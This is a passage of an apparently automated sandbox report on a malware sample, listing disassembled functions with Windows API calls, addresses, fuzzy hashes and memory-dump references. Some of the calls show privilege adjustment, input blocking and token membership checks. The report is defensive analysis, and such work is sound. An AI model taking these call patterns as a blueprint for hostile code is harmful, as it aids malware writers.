                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 577356006-0
                                                                                                                                                                                                                                          • Opcode ID: 70b9852cf9e6140f31f84e387b34351b024852e18772d88fbb88b07b740f89e1
                                                                                                                                                                                                                                          • Instruction ID: 5dee65e64b7bce20875728873c82714bb5c41017433c36fbdd8b75b8bdb23a8a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70b9852cf9e6140f31f84e387b34351b024852e18772d88fbb88b07b740f89e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD11C1B2404305BFD718AF54DC86DBBBBBDEB04754B24852EF05653641EB70BC418A60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0013D608
                                                                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0013D645
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0013D650
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 33631002-0
                                                                                                                                                                                                                                          • Opcode ID: d160bb1c15920a8a34f23ae09bb6f3d03752a9aabcf1e323017d0f55ddd6700d
                                                                                                                                                                                                                                          • Instruction ID: 6bb463fced53983457ed1332e988e61c20144ce37a29690e2e93b4f6fab8c563
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d160bb1c15920a8a34f23ae09bb6f3d03752a9aabcf1e323017d0f55ddd6700d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B115EB5E05228BFDB108F95EC45FAFBBBCEB45B60F108115F914E7290D6B05A058BE1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0013168C
                                                                                                                                                                                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001316A1
                                                                                                                                                                                                                                          • FreeSid.ADVAPI32(?), ref: 001316B1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3429775523-0
                                                                                                                                                                                                                                          • Opcode ID: 63e6eb01b2d7a84167be8a77f4b2d367654dfa57dcf343f0c616dc5f34d8bd60
                                                                                                                                                                                                                                          • Instruction ID: 519033dfb0238adce48cad3c1c0951f81904a16cd3fe612493856c1ff1dd552a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63e6eb01b2d7a84167be8a77f4b2d367654dfa57dcf343f0c616dc5f34d8bd60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FF0F475950309FBDB00DFE49D89AAEBBBCFB08604F504565E501E2181E7B4AA448A90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                                                                          • API String ID: 0-2043925204
                                                                                                                                                                                                                                          • Opcode ID: 3bd60b0923e737fe5cbd555c98d0b72f5df407c81dc18b3555e28157df0629e1
                                                                                                                                                                                                                                          • Instruction ID: c5150098868fce7a8a7f3c41fba57354bca62d3680f8eef0f85ec4244cf5dfea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bd60b0923e737fe5cbd555c98d0b72f5df407c81dc18b3555e28157df0629e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32410876500219ABCB249FB9DC89EBB7778FB84354F504269F945DB1C0E7B09D818B90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0012D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 0012D28C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                                                                          • String ID: X64
                                                                                                                                                                                                                                          • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                          • Opcode ID: 0bae9d81cdc9de9ea7d579cd414b530e37439bc49f0648f666cb657bbc2d8b5c
                                                                                                                                                                                                                                          • Instruction ID: 9715881c8f56d50a0d9402a9c83fab7f3d9dc0d5d5b5cc2e9c68cbb0ba52adf1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bae9d81cdc9de9ea7d579cd414b530e37439bc49f0648f666cb657bbc2d8b5c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23D0C9B480112DEECB94CB90EC88DEDB37CBB04305F100152F106A2000D77095488F60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001468EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00146918
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00146961
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                                          • Opcode ID: 1055b5437cd1f199556e410e223759daf4c4811953e9b0884e08a7b94779ee8f
                                                                                                                                                                                                                                          • Instruction ID: 59b7f7448c9ff598371f0844d20358d3d803f41b6c4da243d8ddcd73970d7959
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1055b5437cd1f199556e410e223759daf4c4811953e9b0884e08a7b94779ee8f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E81190316046019FD710DF29D884A26BBE5FF85328F14C6AEE8698F7A2C770EC45CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001437B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00154891,?,?,00000035,?), ref: 001437E4
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00154891,?,?,00000035,?), ref: 001437F4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3479602957-0
                                                                                                                                                                                                                                          • Opcode ID: f57edec689dcfb7e88540d022b21de4d0ae5818b8d872906ce3d781640ff2479
                                                                                                                                                                                                                                          • Instruction ID: 918afc65c631680e2d2219545d84845398ebc9461d6038287f8cd6331d56a452
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f57edec689dcfb7e88540d022b21de4d0ae5818b8d872906ce3d781640ff2479
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93F0E5B06053292AE72017668C4EFEB7AAEEFC4771F000175F509D2291DAA09944C6F0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001310BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001311FC), ref: 001310D4
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001311FC), ref: 001310E9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 81990902-0
                                                                                                                                                                                                                                          • Opcode ID: 8f47e03b4d4e7656f6f7afc5c37303331e78a0a272b4c6c67abbca456a2071ca
                                                                                                                                                                                                                                          • Instruction ID: 214358aa276fcc2fb0c2418d6b56e154e7c894ddbd6aafc4827efbd31a66d4a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f47e03b4d4e7656f6f7afc5c37303331e78a0a272b4c6c67abbca456a2071ca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98E0BF72018651AEE7252B52FC05EB77BA9EB04310F14882DF5A5905B1DBA26CD0DB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • BlockInput.USER32(00000001), ref: 0014EABD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockInput
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3456056419-0
                                                                                                                                                                                                                                          • Opcode ID: 0edf2a3943a36b195cf175b80e5021c30a20bdb6cb5382655f6c700cf464aa64
                                                                                                                                                                                                                                          • Instruction ID: f0bd62ceee3c0f0d91817550023cc98a373e95d77358a711c4f43ce1b3957835
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0edf2a3943a36b195cf175b80e5021c30a20bdb6cb5382655f6c700cf464aa64
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDE01A312002059FD710EF59D804E9AB7E9BF98760F118426FD49C7361DBB0A8408BA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000F09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000F03EE), ref: 000F09DA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                          • Opcode ID: fcfaf1156bd3b7f7684fe3004cfc6e65a0717dc27f3a51ebb87b7daa6c7b17ac
                                                                                                                                                                                                                                          • Instruction ID: 4d6d687fcda55087aa2028da7b09b054dfe02dc3b72f434b97cf5769a46cd136
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcfaf1156bd3b7f7684fe3004cfc6e65a0717dc27f3a51ebb87b7daa6c7b17ac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00152ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00152B30
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00152B43
                                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00152B52
                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00152B6D
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00152B74
                                                                                                                                                                                                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00152CA3
                                                                                                                                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00152CB1
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152CF8
                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00152D04
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00152D40
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152D62
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152D75
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152D80
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152D89
                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152D98
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152DA1
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152DA8
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00152DB3
                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152DC5
                                                                                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0016FC38,00000000), ref: 00152DDB
                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00152DEB
                                                                                                                                                                                                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00152E11
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00152E30
                                                                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00152E52
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0015303F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                          • Opcode ID: 497dde3c4062295f8ff5f72ae38b3ee965140fe77422bc9d00690ca76cccf2ff
                                                                                                                                                                                                                                          • Instruction ID: f3749578a1bac2b30f68180bcad6ed224720995f5503f75f1e8a48e8b9dd3b75
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 497dde3c4062295f8ff5f72ae38b3ee965140fe77422bc9d00690ca76cccf2ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91027C72900205EFDB14DF64DC89EAE7BB9FF49311F008119F915AB2A1DBB4AD45CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001670D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0016712F
                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00167160
                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0016716C
                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00167186
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00167195
                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 001671C0
                                                                                                                                                                                                                                          • GetSysColor.USER32(00000010), ref: 001671C8
                                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 001671CF
                                                                                                                                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 001671DE
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001671E5
                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00167230
                                                                                                                                                                                                                                          • FillRect.USER32(?,?,?), ref: 00167262
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00167284
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: GetSysColor.USER32(00000012), ref: 00167421
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: SetTextColor.GDI32(?,?), ref: 00167425
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: GetSysColorBrush.USER32(0000000F), ref: 0016743B
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: GetSysColor.USER32(0000000F), ref: 00167446
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: GetSysColor.USER32(00000011), ref: 00167463
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00167471
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: SelectObject.GDI32(?,00000000), ref: 00167482
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: SetBkColor.GDI32(?,00000000), ref: 0016748B
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: SelectObject.GDI32(?,?), ref: 00167498
                                                                                                                                                                                                                                            • Part of subcall function 001673E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001674B7
